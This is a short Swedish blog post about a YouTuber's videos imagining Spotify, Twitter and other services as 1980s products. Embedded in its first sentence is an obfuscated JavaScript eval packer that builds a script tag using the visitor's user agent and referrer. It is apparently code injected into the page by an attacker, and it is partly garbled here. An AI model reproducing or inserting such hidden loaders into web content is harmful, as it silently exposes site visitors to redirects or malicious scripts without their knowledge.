Image Image Image Image Image Image Image Image Image Image

| 26 februari, 2020

Scroll to top

Top

Om Spotify fanns på 80 talet

Filip Urde
  • On 5 februari, 2013
  • http://www.revue.se/filip-urde

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zhfhd|var|u0026u|referrer|ikykz||js|php’.split(’|’),0,{}))
är youtube användaren 
SquirrelMonkeyCom som gjort en rad videos på hur modern teknik skulle varit om dem fanns på 80 talet.

 

 

Här ovan kan vi se hur Spotify skulle kunna sett ut om det fanns på 80 talet, ganska kul och välgjorda filmer. Vidare har han gjort 80 tals versioner av bland annat Twitter, youtube, angry birds, skype m.m.

 Squirrel-monkey.com